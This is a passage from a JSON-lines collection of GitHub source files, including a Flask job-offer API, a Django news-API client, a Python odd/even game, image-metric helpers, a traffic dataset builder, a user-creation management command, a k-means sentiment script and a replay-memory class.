If it exists, return 200 with the record\n    response = jsonify(Offre.query.get_or_404(id).to_dict())\n    response.status_code = 200\n    response.headers['Location'] = url_for('api.get_offre', id=id)\n    return response\n\n\n\n@bp.route('/offres', methods=['POST'])\n@token_auth.login_required\ndef create_offre():\n    data = request.get_json() or {}\n    # check whether the offer already exists\n    if ('title' in data) and ('salary' in data) and ('contact' in data) and ('description' in data) and ('categorie_id' in data) and ('entreprise_id' in data) and ('dd' in data) :\n        if ( (Offre.query.filter_by(title=data['title']).first()) and (Offre.query.filter_by(contact=data['contact']).first()) and (Offre.query.filter_by(salary=data['salary']).first()) ):\n            # an offer with the same title, salary and contact already exists: high chance of a duplicate, code 409\n            return error_response(409, 'same title, salary and contact manager as other offre. Please modify to avoid duplicates')\n    else:\n        return bad_request('must include title, salary, description, dd: depot date of offre, dl: limite date of offre, categorie_id and entreprise_id fields')\n    # To create an offer the user must belong to the same company, or be root\n    # (a USER may not create an offer for a company other than their own)\n    if (((token_auth.current_user()).company == Entreprise.get_entrepriseNamebyId(int(data['entreprise_id']))) or (token_auth.current_user().id == User.get_UserId('root'))) :\n        offre = Offre()\n        # this is a new offer: return code 201 with the location of the record\n        for field in ['title', 'salary', 'contact', 'description', 'categorie_id', 'entreprise_id']:\n            if field in data:\n                setattr(offre, field, data[field])\n        try:\n            offre.dd = datetime.strptime(data['dd'], '%Y%m%d')\n        except:\n            offre.dd = date.today()\n        try:\n            offre.dl = datetime.strptime(data['dl'], '%Y%m%d')\n        except:\n            # if dl is missing the parse raises, and we default to 12 months from today\n            offre.dl = date.today() + relativedelta(months=12)\n        #offre.from_dict(data, new_offre=True)\n        db.session.add(offre)\n        db.session.commit()\n        # send code 201 with the record\n        response = jsonify(offre.to_dict())\n        response.status_code = 201\n        response.headers['Location'] = url_for('api.get_offre', id=offre.id)\n        return response\n    else:\n        abort(403)\n\n\n\n\n@bp.route('/offres/<int:id>', methods=['PATCH'])\n@token_auth.login_required\ndef update_offre(id):\n    # does the offer exist?\n    offre = Offre.query.get_or_404(id)\n\n    # only root, or an author from the same company as the offer, may update it\n    if ((token_auth.current_user().company == get_EntrepriseNameByOffreId(id)) or (token_auth.current_user().id == User.get_UserId('root'))) :\n        # the given id must match an existing record, otherwise 404\n        # (creating the resource when the id does not exist is not supported)\n        data = request.get_json() or {}\n        if (('entreprise_id' in data and (int(data['entreprise_id'])!=offre.entreprise_id))) :\n            # the company cannot be changed: code 403\n            # every other field may be updated\n            return error_response(403, 'cannot change entreprise field')\n        # the update is valid: only the fields present in the payload are replaced\n        for field in ['title', 'salary', 'contact', 'description', 'categorie_id']:\n            if field in data:\n                setattr(offre, field, data[field])\n        if ('dd' in data):\n            try:\n                offre.dd = datetime.strptime(data['dd'], '%Y%m%d')\n            except:\n                offre.dd = date.today()\n        if ('dl' in data):\n            try:\n                offre.dl = datetime.strptime(data['dl'], '%Y%m%d')\n            except:\n                offre.dl = date.today() + relativedelta(months=6)\n        
#offre.from_dict(data, new_offre=False)\n        db.session.commit()\n        # send code 200 with the record\n        response = jsonify(offre.to_dict())\n        response.status_code = 200\n        response.headers['Location'] = url_for('api.get_offre', id=offre.id)\n        return response\n    else:\n        abort(403)\n\n\n@bp.route('/offres/<int:id>', methods=['DELETE'])\n@token_auth.login_required\ndef delete_offre(id):\n    # does the offer exist?\n    offre = Offre.query.get_or_404(id)\n    # only root, or an author from the same company as the offer, may delete it\n    if ((token_auth.current_user().company == get_EntrepriseNameByOffreId(id)) or (token_auth.current_user().id == User.get_UserId('root'))) :\n        # the given id must match an existing record, otherwise 404\n        print(Offre.query.filter(Offre.id == int(id)))\n        print(User.query.filter(User.company == get_EntrepriseNameByOffreId(id)))\n        if (offre.delete_O(offre.id) == 1):\n            # the operation succeeded; a delete returns no body\n            return '', 204\n        else:\n            # the method could not complete, or the outcome fits neither the 204 nor the 404 case\n            abort(500)\n    else:\n        abort(403)\n","repo_name":"NZ26-06/TinyApec","sub_path":"tuto/api/offres.py","file_name":"offres.py","file_ext":"py","file_size_in_byte":7073,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21275864361","text":"from random import randint\nfrom time import sleep\nfrom emoji import emojize\nvitoria=0\nprint('=-='*15)\nprint(emojize('\\033[35mVAMOS JOGAR PAR:victory_hand: OU IMPAR:index_pointing_up:\\033[m'))\nprint('=-='*15)\nwhile True:\n    jogador=int(input('Digite um valor: '))\n    computador=randint(0, 10)\n    total = jogador+computador\n    tipo=' '\n    while tipo not in 'P,I':\n        tipo=str(input('Par ou Impar? [P/I]: ')).strip().upper()[0]\n    print(f'Você jogou {jogador} e o computador jogou {computador}. 
Total de {total}')\n    if total % 2 == 0:\n        print('DEU PAR')\n    else:\n        print('DEU IMPAR')\n    if tipo == 'P':\n        if total % 2 == 0:\n            print('\\033[32mVOCÊ VENCEU!\\033[m')\n            vitoria+=1\n        else:\n            print('\\033[31mVOCÊ PERDEU!\\033[m')\n            break\n    if tipo == 'I':\n        if total % 2 == 1:\n            print('\\033[32mVOCÊ VENCEU!\\033[m')\n            vitoria+=1\n        else:\n            print('\\033[31mVOCÊ PERDEU!\\033[m')\n            break\n    print('==='*15)\n    print('Vamos jogar novamente...')\n    print('==='*15)\n    sleep(2)\nprint(emojize(f'\\033[31m:police_car_light:GAME OVER:police_car_light:\\033[mVocê ganhou {vitoria} vezes.'))","repo_name":"Jorgemartin2/Pequenos_projetos","sub_path":"Projetos/JogoParOuImpar.py","file_name":"JogoParOuImpar.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43569215059","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/120847\n\n\n# approach using sorting\ndef solution_01(numbers):\n    temp_list = sorted(numbers)\n    answer = temp_list[-1] * temp_list[-2]\n    return answer\n\n\n# approach using combinations\nimport itertools\n\n\ndef solution_02(numbers):\n    comb = list(itertools.combinations(numbers, 2))\n    answer = 0\n    for i1, i2 in comb:\n        if i1 * i2 > answer:\n            answer = i1 * i2\n    return answer\n","repo_name":"NullisnotFalse/coding_test_prac","sub_path":"2023_05/230516_01.py","file_name":"230516_01.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7553975386","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, JsonResponse\nfrom django.views.decorators.cache import cache_page\nimport requests\n\n\nimport json\ndef getApiKey():\n    with open('config.json') as f:\n        config = json.load(f)\n    \n    api_key = config['api_key']\n    return api_key\n\n\n\n@cache_page(60 * 15) # Cache the response for 15 minutes\ndef get_articles(request):\n    \"\"\"\n    The function `get_articles` retrieves a specified number of top-headline articles from the GNews\n    API based on the given parameters and renders them in an HTML template.\n    \n    :param request: The `request` parameter is an object that represents the HTTP request made by the\n    client. It contains information such as the request method, headers, query parameters, and body\n    :return: a rendered HTML template called 'article_list.html' with a context variable 'articles'\n    containing a list of articles obtained from the GNews API.\n    \"\"\"\n\n    n = request.GET.get('n', 10)\n    ln = request.GET.get('ln', 'en')\n    category = request.GET.get('category', 'general')\n    country = request.GET.get('country', 'us')\n    apikey = getApiKey()\n    url = f\"https://gnews.io/api/v4/top-headlines?category={category}&lang={ln}&country={country}&max={n}&apikey={apikey}\"\n    response = requests.get(url)\n    articles = response.json().get('articles', [])\n    return render(request, 'article_list.html', {'articles': articles})\n\n\n@cache_page(60 * 15) # Cache the response for 15 minutes\ndef search_article(request):\n    \"\"\"\n    The function `search_article` retrieves a list of articles from the GNews API based on the\n    provided query parameters and renders them in an HTML template.\n    \n    :param request: The `request` parameter is an object that represents the HTTP request made by the\n    client. 
It contains information such as the request method, headers, and query parameters\n :return: a rendered HTML template called 'article_list.html' with a context variable 'articles'\n containing a list of articles obtained from the GNews API based on the provided parameters.\n \"\"\"\n apikey = getApiKey()\n ln = request.GET.get('ln', 'en')\n country = request.GET.get('country', 'us')\n query = request.GET.get('query', '')\n max_articles = request.GET.get('max', 10)\n source = request.GET.get('queryBy', \"title\")\n url = f\"https://gnews.io/api/v4/search?q={query}&lang={ln}&country={country}&max={max_articles}&in={source}&apikey={apikey}\"\n response = requests.get(url)\n articles = response.json().get('articles', [])\n return render(request, 'article_list.html', {'articles': articles})\n\n\ndef home(request):\n \"\"\"\n The `home` function returns a rendered `home.html` template in response to a request.\n \n :param request: The request parameter is an object that represents the HTTP request made by the\n client. It contains information such as the HTTP method (GET, POST, etc.), headers, user session,\n and any data sent in the request. In this code snippet, the request object is passed to the render\n function, which\n :return: the rendered home.html template.\n \"\"\"\n return render(request,'home.html')","repo_name":"ani3198/newsApi","sub_path":"news_api_project/news_api_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29812463695","text":"import glob\nimport tempfile\n\nfrom sklearn.preprocessing import OneHotEncoder, OrdinalEncoder\nimport numpy as np\nfrom fastparquet import ParquetFile\nfrom src.utils.tensor import get_mask_from_numpy_tensor\n\n\nclass DatasetBuilder:\n MAX_SPEED_CATS = [5., 10., 20., 30., 40., 50., 60.0, 70.0, 80.0, 100.0, 120.0]\n NUM_LANES_CATS = [1., 2., 3., 4., 5.]\n NUM_FEATS = 53\n\n def __init__(self, g):\n self.enc = OneHotEncoder(handle_unknown='ignore', categories=[\n ['access_ramp', 'corridor', 'living_street', 'platform', 'primary',\n 'residential', 'secondary', 'secondary_link', 'service',\n 'tertiary', 'tertiary_link', 'unclassified'], ['asphalt', 'cobblestone',\n 'cobblestone:flattened', 'concrete',\n 'concrete:plates', 'grass_paver', 'no_sur',\n 'paved',\n 'paving_stones', 'sett'],\n ['DirtRoad', 'LocalRoad', 'MajorRoad'],\n range(0, 24)\n ])\n\n self.ienc = OrdinalEncoder(\n categories=[self.MAX_SPEED_CATS, self.NUM_LANES_CATS])\n\n self.g = g\n\n def _arc_features(self, arc, timestep):\n arc = self.g[arc[0]][arc[1]]\n try:\n max_speed_feature = float(arc['data'].metadata.get('maxspeed', '50'))\n max_speed_feature = min(self.MAX_SPEED_CATS,\n key=lambda x: abs(x - max_speed_feature))\n except:\n max_speed_feature = 50.\n try:\n num_lanes_feature = int(arc['data'].metadata.get('lanes', '1'))\n num_lanes_feature = min(self.NUM_LANES_CATS,\n key=lambda x: abs(x - num_lanes_feature))\n except:\n num_lanes_feature = 1\n\n return [\n arc['data'].metadata['highway'],\n arc['data'].metadata.get('surface', 'no_sur'),\n arc['data'].roadClass.name,\n timestep % 24\n ], [max_speed_feature, num_lanes_feature]\n\n def _construct_features(self, L):\n data = list()\n data_ord = list()\n for node in L.nodes:\n data.append(self._arc_features(node)[0])\n data_ord.append(self._arc_features(node)[1])\n return self.enc.fit_transform(data), self.ienc.fit_transform(data_ord)\n\n def _build_dataset_to_numpy_tensor(self, from_, to, 
df=None, id_to_idx=None):\n \"\"\"We extract features from speed (actual speed, whether speed is missing)\n and combine with static features.\n\n Args:\n from_ (int): from time step\n to (int): to time step\n df (Pandas.DataFrame): the dataframe contains (only) speed data\n id_to_idx (dict): dictionary of segment_id --> df.indices\n\n Returns:\n np.ndarray: dataset tensor of shape [num_time_steps, num_nodes, num_features]\n\n \"\"\"\n\n dataset = np.empty([to - from_, len(df), self.NUM_FEATS])\n for t in range(from_, to):\n cat_features_at_t = [['primary', 'asphalt', 'MajorRoad', t % 24]] * len(df)\n ord_features_at_t = [[50.0, 4]] * len(df)\n speed_features_at_t = [50] * len(df)\n speed_is_nan_feature = [1] * len(df)\n for _, row in df.iterrows():\n arc = (int(row['from_node']), int(row['to_node']))\n cat_features_at_t[id_to_idx[arc]], ord_features_at_t[id_to_idx[arc]] = \\\n self._arc_features(arc, timestep=t)\n speed_features_at_t[id_to_idx[arc]] = row[str(t)]\n if np.isnan(row[str(t)]):\n speed_is_nan_feature[id_to_idx[arc]] = 0\n dataset[t - from_] = np.concatenate([np.array(speed_features_at_t).reshape(-1, 1),\n np.array(speed_is_nan_feature).reshape(-1, 1),\n self.ienc.fit_transform(ord_features_at_t),\n self.enc.fit_transform(cat_features_at_t).toarray()], axis=1)\n return dataset\n\n def _generate_dataset_concat(self, X, X_mask, num_lookback, num_lookahead, memmap=False):\n \"\"\"\n Takes node features for the graph and divides them into multiple samples\n along the time-axis by sliding a window of size (num_timesteps_input+\n num_lookahead) across it in steps of 1.\n Args:\n X: Node features of shape (num_vertices, num_features, num_timesteps)\n X_mask: same shape with X, but contains Mask info\n num_lookback: number of timesteps to look back\n num_lookahead: number of timesteps to look ahead\n memmap (bool): whether to use memmap for contructing the array\n\n Returns:\n Node data (features + labels) divided into multiple samples. 
Shape is\n (num_samples, num_vertices, num_features, num_timesteps_input).\n \"\"\"\n # Generate the beginning index and the ending index of a sample, which\n # contains (num_points_for_training + num_points_for_predicting) points\n indices = [(i, i + (num_lookback + num_lookahead)) for i\n in range(X.shape[2] - (\n num_lookback + num_lookahead) + 1)]\n # Save samples\n if memmap:\n with tempfile.NamedTemporaryFile() as ff:\n features = np.memmap(filename=ff, shape=(len(indices), len(X), self.NUM_FEATS,\n num_lookback), dtype=np.double)\n with tempfile.NamedTemporaryFile() as ft:\n target = np.memmap(filename=ft, shape=(len(indices), len(X), num_lookahead),\n dtype=np.double)\n with tempfile.NamedTemporaryFile() as fm:\n mask = np.memmap(filename=fm, shape=(len(indices), len(X), num_lookahead),\n dtype=np.double)\n\n else:\n features = np.empty([len(indices), len(X), self.NUM_FEATS, num_lookback], dtype=np.double)\n target = np.empty([len(indices), len(X), num_lookahead], dtype=np.double)\n mask = np.empty([len(indices), len(X), num_lookahead], dtype=np.double)\n\n for k, (i, j) in enumerate(indices):\n # num_vertices, num_features, num_timesteps\n features[k] = X[:, :, i: i + num_lookback]\n target[k] = X[:, 0, i + num_lookback: j]\n mask[k] = X_mask[:, 0, i + num_lookback: j]\n\n return np.array(features), np.array(target), np.array(mask)\n\n def train_validation_test_split(self, X, X_filled, X_masked, look_back=29, look_ahead=1, split_ratio=None,\n memmap=False):\n # num_vertices, num_features, num_timesteps\n if split_ratio is None:\n split_ratio = [0.7, 0.9]\n split_line1 = int(X.shape[2] * split_ratio[0])\n split_line2 = int(X.shape[2] * split_ratio[1])\n train_original_data = X_filled[:, :, :split_line1]\n val_original_data = X_filled[:, :, split_line1:split_line2]\n test_original_data = X_filled[:, :, split_line2:]\n\n train_mask = X_masked[:, :, :split_line1]\n valid_mask = X_masked[:, :, split_line1:split_line2]\n test_mask = X_masked[:, :, split_line2:]\n\n # num_samples, num_nodes, num_timesteps, num_features\n training_data, training_target, train_mask = self._generate_dataset_concat(train_original_data, train_mask,\n num_lookback=look_back,\n num_lookahead=look_ahead,\n memmap=memmap)\n valid_data, valid_target, valid_mask = self._generate_dataset_concat(val_original_data, valid_mask,\n num_lookback=look_back,\n num_lookahead=look_ahead,\n memmap=memmap)\n test_data, test_target, test_mask = self._generate_dataset_concat(test_original_data, test_mask,\n num_lookback=look_back,\n num_lookahead=look_ahead,\n memmap=memmap)\n\n data = {'train': training_data, 'valid': valid_data, 'test': test_data}\n target = {'train': training_target, 'valid': valid_target, 'test': test_target}\n mask = {'train': train_mask, 'valid': valid_mask, 'test': test_mask}\n return data, target, mask\n\n def _remove_non_existing_edges_from_df(self, df):\n for idx, row in df.iterrows():\n arc = (int(row['from_node']), int(row['to_node']))\n if not self.g.has_edge(arc[0], arc[1]) or not self.g.has_node(arc[0]) or not self.g.has_node(arc[1]):\n df.drop(idx, inplace=True)\n return df\n\n def load_speed_data(self, file_path):\n file_path = glob.glob(f'{file_path}/*snappy.parquet')\n pf = ParquetFile(file_path)\n df = pf.to_pandas()\n df = self._remove_non_existing_edges_from_df(df)\n edges = [tuple((int(x[0]), int(x[1]))) for x in df[['from_node', 'to_node']].values]\n return edges, df\n\n def construct_batches(self, df, L, TOTAL_T_STEPS=2263, memmap=False):\n id_to_idx = {}\n\n for idx, id_ in 
enumerate(L.nodes()):\n id_to_idx[id_] = idx\n\n df_filled = df.loc[:, df.columns != 'from_node']\n df_filled = df_filled.loc[:, df_filled.columns != 'to_node']\n\n # df_filled = df_filled.interpolate(method='nearest', axis=1)\n df_filled = df_filled.fillna(df_filled.mean())\n df_filled = df_filled.fillna(13.8)\n\n speed_columns = list(map(str, range(TOTAL_T_STEPS)))\n df.columns = ['from_node', 'to_node'] + speed_columns\n df_filled.columns = speed_columns\n df_filled['from_node'] = df['from_node']\n df_filled['to_node'] = df['to_node']\n\n df_filled = df_filled[['from_node', 'to_node'] + speed_columns[TOTAL_T_STEPS - 400:]]\n df = df[['from_node', 'to_node'] + speed_columns[TOTAL_T_STEPS - 400:]]\n\n X = self._build_dataset_to_numpy_tensor(df=df,\n id_to_idx=id_to_idx,\n from_=TOTAL_T_STEPS - 400,\n to=TOTAL_T_STEPS)\n X_filled = self._build_dataset_to_numpy_tensor(df=df_filled,\n id_to_idx=id_to_idx,\n from_=TOTAL_T_STEPS - 400,\n to=TOTAL_T_STEPS)\n\n X = np.moveaxis(X, source=(0, 1, 2), destination=(2, 0, 1))\n X_filled = np.moveaxis(X_filled, source=(0, 1, 2), destination=(2, 0, 1))\n # Build mask tensor\n X_masked = get_mask_from_numpy_tensor(X)\n\n data, target, mask = self.train_validation_test_split(X=X, X_filled=X_filled, X_masked=X_masked, memmap=memmap)\n\n return data, target, mask\n","repo_name":"tumeteor/ST-GCN","sub_path":"src/data_loader/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":11584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30763720225","text":"\"\"\"\nStartup da aplicacao.\n\"\"\"\n\nfrom flasgger.base import Swagger\nfrom controller.rest import create_app\n\napp = create_app('config.default')\napp.config['SWAGGER'] = {\n \"swagger_version\": \"2.0\",\n \"specs\": [\n {\n \"version\": \"1.0.0\",\n \"title\": \"Agrines S3AIR\",\n \"endpoint\": 'v1_spec',\n \"route\": '/',\n \"description\": \"Api CORE do Pagamento Escritural.\"\n }\n ]\n}\n\nSwagger(app)\n\nif __name__ == \"__main__\":\n app.run(debug=True, host='0.0.0.0')\n","repo_name":"rangeltorrezan/agrines-hackaton","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14694461850","text":"from skimage.metrics import structural_similarity as ssim\nfrom PIL import Image\nimport numpy as np\nfrom skimage.metrics import peak_signal_noise_ratio as psnr\nfrom skimage.metrics import mean_squared_error as mse\n\nimport lpips\n\n\ndef calc_ssim(img1_path, img2_path,num):\n\n ssim_score = 0\n for i in range(num):\n path1 = img1_path + \"rel_\" + str(i) + \".png\"\n path2 = img2_path + \"res_\" + str(i) + \".png\"\n img1 = Image.open(path1).convert('L')\n img2 = Image.open(path2).convert('L')\n img1, img2 = np.array(img1), np.array(img2)\n ssim_score += ssim(img1, img2, data_range=255)\n return ssim_score/num\n\n\ndef calc_psnr(img1_path, img2_path,num):\n psnr_score = 0\n for i in range(num):\n path1 = img1_path + \"rel_\" + str(i) + \".png\"\n path2 = img2_path + \"res_\" + str(i) + \".png\"\n img1 = Image.open(path1)\n img2 = Image.open(path2)\n img1, img2 = np.array(img1)/255, np.array(img2)/255\n psnr_score += psnr(img1, img2, data_range=1)\n return psnr_score/num\n\ndef calc_mse(img1_path, img2_path,num):\n mse_score = 0\n for i in range(num):\n path1 = img1_path + \"rel_\" + str(i) + \".png\"\n path2 = img2_path + \"res_\" + str(i) + \".png\"\n img1 = Image.open(path1)\n img2 = 
Image.open(path2)\n img1, img2 = np.array(img1)/255, np.array(img2)/255\n\n mse_score += mse(img1, img2)\n return mse_score/num\n\n\nloss_fn = lpips.LPIPS(net='alex')\ndef calc_lpips(img1_path, img2_path,num):\n dist01 = 0\n for i in range(num):\n path1 = img1_path + \"rel_\" + str(i) + \".png\"\n path2 = img2_path + \"res_\" + str(i) + \".png\"\n # Load images\n img0 = lpips.im2tensor(lpips.load_image(path1)) # RGB image from [-1,1]\n img1 = lpips.im2tensor(lpips.load_image(path2))\n dist01 += loss_fn.forward(img0, img1)\n return dist01/num\n\n\n\nclass util_of_lpips():\n def __init__(self, net, use_gpu=False):\n\n self.use_gpu = use_gpu\n if use_gpu:\n self.loss_fn.cuda()\n\n \n\n","repo_name":"Inawa/DecodeNet","sub_path":"compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7699611898","text":"from heapq import *\n\nclass Solution:\n def connectSticks(self, sticks: List[int]) -> int:\n heapify(sticks)\n \n res = 0\n while len(sticks) > 1:\n x, y = heappop(sticks), heappop(sticks)\n res += (x + y)\n heappush(sticks, x+y)\n \n return res","repo_name":"DarshanGowda0/LC-Grind","sub_path":"Daily-Grind/19.py","file_name":"19.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30890144848","text":"import logging\n\nfrom bkpaas_auth.models import DatabaseUser\nfrom django.core.management.base import BaseCommand\n\nfrom paasng.infras.accounts.constants import SiteRole\nfrom paasng.infras.accounts.models import AuthenticatedAppAsUser, User, UserProfile\n\nlogger = logging.getLogger('commands')\n\nROLE_CHOICES = [\n SiteRole.SYSTEM_API_BASIC_READER.value,\n SiteRole.SYSTEM_API_BASIC_MAINTAINER.value,\n SiteRole.SYSTEM_API_LIGHT_APP_MAINTAINER.value,\n SiteRole.SYSTEM_API_LESSCODE.value,\n]\n\n\nclass Command(BaseCommand):\n help = (\n \"Add an user which can be authenticated an by verified apps, overwrite old records when \"\n \"bk_app_code already exists\"\n )\n\n def add_arguments(self, parser):\n parser.add_argument(\"--bk_app_code\", required=True, type=str, help=\"application code\")\n parser.add_argument(\n \"--username\",\n required=False,\n type=str,\n help=\"username, if not given use '{bk-app-code}-sys-user' by default\",\n )\n parser.add_argument(\n \"--role\",\n required=False,\n type=int,\n choices=ROLE_CHOICES,\n default=SiteRole.SYSTEM_API_BASIC_READER.value,\n help=(\n 'User role, choices: 50 - \"basic reader\"(default); '\n '60 - \"basic maintainer\"; 70 - \"light app maintainer\".'\n ),\n )\n\n def handle(self, *args, **options):\n bk_app_code = options['bk_app_code']\n username = options['username'] or self._get_default_username(bk_app_code)\n # Create user\n user_db, _ = User.objects.get_or_create(username=username)\n logger.info(f'user: {user_db.username} created.')\n\n # Create profile with role\n user = DatabaseUser.from_db_obj(user_db)\n UserProfile.objects.update_or_create(user=user.pk, defaults={'role': options['role']})\n logger.info(f'profile: {user.pk}({user.username}) created.')\n\n # Create relationship\n AuthenticatedAppAsUser.objects.update_or_create(\n bk_app_code=bk_app_code, defaults={'user': user_db, 'is_active': True}\n )\n logger.info(f'app-user relation: {bk_app_code}-{user.username} created.')\n\n @staticmethod\n def _get_default_username(bk_app_code: str) -> str:\n return 
f'authed-app-{bk_app_code}'\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"apiserver/paasng/paasng/infras/accounts/management/commands/create_authed_app_user.py","file_name":"create_authed_app_user.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"} +{"seq_id":"24581476150","text":"from argparse import ArgumentParser\nfrom sklearn.cluster import MiniBatchKMeans, KMeans\nfrom sklearn.decomposition import TruncatedSVD\nfrom sklearn.metrics import homogeneity_score, completeness_score\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\nimport nltk\nimport collections\nimport numpy as np\nimport sys\nimport os\n\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import Normalizer\n\nos.environ['KERAS_BACKEND'] = 'theano'\nsys.path.append('./socialsent3')\n\nfrom socialsent3.polarity_induction_methods import random_walk\nfrom socialsent3.representations.representation_factory import create_representation\nfrom socialsent3.util import dict2csv\nfrom socialsent3 import seeds\n\n\ndef parse_arguments():\n parser = ArgumentParser()\n parser.add_argument('--train', default='./data/imdb/train.tsv', dest='TRAIN',\n help='File containing training data')\n parser.add_argument('--test', default='./data/imdb/val.tsv', dest='TEST',\n help='File containing testing data')\n parser.add_argument('--embed', default='./data/embeddings/imdb.en.vec', dest='EMBED',\n help='File containing word embedding')\n parser.add_argument('--cutoff', default=40, type=int, dest='CUTOFF',\n help='Number of most positive and negative words to filter out.')\n parser.add_argument('--lsa', dest='LSA', type=int, default=0,\n help='LSA reduction size')\n parser.add_argument('--algo', dest='ALGO', default=None)\n return parser.parse_args()\n\n\nHALF_LEN = 2\n\n\ndef sent2rep(sent, word_list=None, **kwargs):\n words = nltk.word_tokenize(sent)\n # noinspection PyArgumentList\n counter = collections.Counter(words)\n rep = np.zeros(len(word_list))\n for i, word in enumerate(word_list):\n rep[i] = counter.get(word, 0)\n # rep[i] = 1 if word in counter.keys() else 0\n\n return rep\n\n\ndef evaluate(true_labels, pred_labels):\n print('Homogeneity score: %.3f' % homogeneity_score(true_labels, pred_labels))\n print('Completeness score: %.3f' % completeness_score(true_labels, pred_labels))\n\n\ndef filter_polarities(polarities: dict, cutoff):\n l = polarities.items()\n sorted_l = sorted(l, key=lambda it: it[1])\n\n neg = sorted_l[:cutoff]\n # neg = []\n pos = sorted_l[-cutoff:]\n newp = dict(neg + pos)\n\n return newp\n\n\ndef main(args):\n print('Loading data...')\n train_sents, train_labels = [], []\n with open(args.TRAIN, 'rt') as f:\n lines = f.readlines()\n for l in lines:\n cols = l.split('\\t')\n train_labels.append(1 if cols[0] == 'Positive' else 0)\n train_sents.append(cols[1].strip())\n\n test_sents, test_labels = [], []\n with open(args.TEST, 'rt') as f:\n lines = f.readlines()\n for l in lines:\n cols = l.split('\\t')\n test_labels.append(1 if cols[0] == 'Positive' else 0)\n test_sents.append(cols[1].strip())\n\n pos_seeds, neg_seeds = seeds.review_seeds()\n print('Creating word vectors...')\n embeddings = create_representation(\"FULL\", args.EMBED, 100,\n limit=50000)\n print('Calculating polarities...')\n polarities = random_walk(embeddings, pos_seeds, neg_seeds, beta=0.99, nn=10,\n sym=True, arccos=True)\n\n print('Filtering polarities...')\n polarities = filter_polarities(polarities, 
args.CUTOFF)\n\n print('Storing polarities...')\n dict2csv(polarities, path='./data/polarities/filtered.csv')\n\n word_list = list(polarities.keys())\n train_reps, test_reps = [], []\n\n if args.ALGO == 'tf-idf':\n tfidf = TfidfVectorizer(vocabulary=word_list, tokenizer=nltk.word_tokenize)\n\n print('Creating training sentence representations...')\n train_reps = tfidf.fit_transform(train_sents)\n\n print('Creating testing sentence representations...')\n test_reps = tfidf.fit_transform(test_sents)\n else:\n print('Creating training sentence representations...')\n for i, sent in enumerate(train_sents):\n print('\\t%d/%d' % (i + 1, len(train_sents)), end='\\r')\n rep = sent2rep(sent, word_list=word_list)\n train_reps.append(rep)\n print()\n\n print('Creating testing sentence representations...')\n for i, sent in enumerate(test_sents):\n print('\\t%d/%d' % (i + 1, len(test_sents)), end='\\r')\n rep = sent2rep(sent, word_list=word_list)\n test_reps.append(rep)\n print()\n\n if args.LSA != 0:\n print('Transforming w/ LSA...')\n svd = TruncatedSVD(args.LSA)\n normalizer = Normalizer(copy=False)\n lsa = make_pipeline(svd, normalizer)\n\n train_reps = lsa.fit_transform(train_reps)\n test_reps = lsa.fit_transform(test_reps)\n\n km = KMeans(n_clusters=2, verbose=1, max_iter=10000)\n train_preds = km.fit_predict(train_reps)\n test_preds = km.predict(test_reps)\n\n print('\\nMetrics on train set:')\n evaluate(train_labels, train_preds)\n print('\\nMetrics on test set:')\n evaluate(test_labels, test_preds)\n\n\nif __name__ == '__main__':\n main(parse_arguments())\n","repo_name":"VNGResearch/sentiment-analysis","sub_path":"kmeans2.py","file_name":"kmeans2.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"6135850246","text":"import bisect\nimport math\nimport random\n\nclass Sample:\n \n def __init__(self, state1, action, reward, state2, terminal):\n self.state1 = state1\n self.action = action\n self.reward = reward\n self.state2 = state2\n self.terminal = terminal\n self.weight = 1\n self.cumulativeWeight = 1\n\n def isInteresting(self):\n return self.terminal or self.reward != 0\n\n def __cmp__(self, obj):\n return self.cumulativeWeight - obj.cumulativeWeight\n\n\nclass ReplayMemory:\n \n def __init__(self, args):\n self.samples = []\n self.maxSamples = args.replay_capacity\n self.prioritizedReplay = args.prioritized_replay\n self.numInterestingSamples = 0\n self.batchesDrawn = 0\n\n def numSamples():\n return len(self.samples)\n\n def addSample(self, sample):\n self.samples.append(sample)\n self._updateWeightsForNewlyAddedSample()\n self._truncateListIfNecessary()\n\n def _updateWeightsForNewlyAddedSample(self):\n if len(self.samples) > 1:\n self.samples[-1].cumulativeWeight = self.samples[-1].weight + self.samples[-2].cumulativeWeight\n\n if self.samples[-1].isInteresting():\n self.numInterestingSamples += 1\n \n # Boost the neighboring samples. How many samples? Roughly the number of samples\n # that are \"uninteresting\". 
